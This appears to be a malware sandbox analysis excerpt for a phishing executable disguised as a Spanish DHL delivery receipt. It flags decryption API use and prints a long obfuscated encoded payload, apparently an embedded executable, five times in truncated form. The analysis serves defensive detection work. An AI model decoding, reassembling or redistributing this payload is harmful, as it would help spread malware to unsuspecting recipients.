Source: 5.2.Recibo de entrega de DHL.exe.400000.0.unpack, ???W???W????????W???u??yy???W??W????????Wu???.cs

Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'

Source: Recibo de entrega de DHL.exe, Form1.cs	Base64 encoded string: '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
Source: 0.0.Recibo de entrega de DHL.exe.a00000.0.unpack, Form1.cs	Base64 encoded string: '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
Source: 0.2.Recibo de entrega de DHL.exe.a00000.0.unpack, Form1.cs	Base64 encoded string: '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
Source: 4.2.Recibo de entrega de DHL.exe.310000.0.unpack, Form1.cs	Base64 encoded string: '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
Source: 4.0.Recibo de entrega de DHL.exe.310000.0.unpack, Form1.cs	Base64 encoded string: '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
